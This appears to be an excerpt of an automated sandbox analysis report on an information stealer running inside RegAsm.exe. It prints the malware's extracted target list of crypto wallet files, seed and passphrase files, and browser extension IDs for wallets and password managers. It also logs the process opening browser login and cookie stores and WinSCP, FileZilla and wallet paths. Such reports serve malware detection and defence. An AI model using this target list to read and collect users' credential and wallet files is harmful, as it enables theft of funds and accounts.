Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
